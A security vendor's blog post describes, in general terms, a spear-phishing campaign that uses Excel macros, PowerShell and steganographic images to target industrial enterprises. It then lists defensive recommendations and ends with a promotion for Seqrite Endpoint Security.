Supply chains and industrial enterprises are being targeted through a series of ongoing spear-phishing attacks. This recent campaign, observed on systems within Germany, United States and Japan thus far, operates through the obfuscation of malware on public, legitimate sources.

Sophisticated attack chain

The attack chain is sufficiently drawn-out to escape detection. It starts through phishing emails that have been tailored and customized for each victim. These phishing emails urge the respondent to open the attached Excel document; on opening the document, users are asked to enable active content, triggering a malicious PowerShell script. On execution of the script, the code accesses a public image hosting service and proceeds to download an image which initiates the data-extraction procedure.

A unique attribute of this specialized spear-phishing campaign is that data is hidden in the downloaded image and is then later processed by the malware. This is a tactic called steganography which is defined as the practice of concealing specific data inside another piece of data. By hiding the data inside the image, the attackers can evade cybersecurity solutions that scan enterprise perimeters.

Analysis of this spear-phishing campaign observed that this is an extremely methodical and targeted attack. The original phishing emails are tailored to the specific targets – users in Japan received emails in Japanese with the attachment containing the malicious macro.

Unique in its attack capability

While researchers have found variants of this attack since 2018, this new variation is unique because of its affinity for industrial enterprises and supply chains. Mostly industrial enterprises have been attacked through this campaign so far. With the manufacturing sector already seeing a fundamental disruption in revenues due to the ongoing COVID-19 pandemic, this is another major challenge and could cause further problems, if not treated properly.

Secondly, as noted earlier, the execution of this phishing campaign is conducted through steganographic tactics by being embedded in images. This makes it impossible for cybersecurity solutions to detect and block malware. By using a decryption key for the malicious payload, it becomes even more difficult for security administrators to analyze and block the malware.

However, industrial enterprises should not panic but follow a set of security recommendations to ensure maximum protection:

• Ensure employees are educated about spotting and reporting phishing campaigns. Periodic awareness in the form of information campaigns should be conducted so that employees are aware of the common tactics criminal use to trick them
• As much as possible, macros should be restricted in Microsoft Office documents to lower the vulnerability threshold
• The importance of strong authentication controls cannot be underemphasized. Employees, especially senior leaders, must be regularly reminded to maintain strong passwords for their user accounts and to regularly change them. Good password hygiene goes a long way in preventing these kinds of spear-phishing attacks.
• If not already done, install and maintain an integrated cybersecurity solution with features such as anti-phishing and anti-virus. It is essential to update this cybersecurity solution regularly to ensure it is updated with the latest patches.

Seqrite Endpoint Security integrates a range of powerful features such as phishing & spam protection, Antivirus, Anti Ransomware & Email Protection to help industrial enterprises and other organizations ensure complete security and control.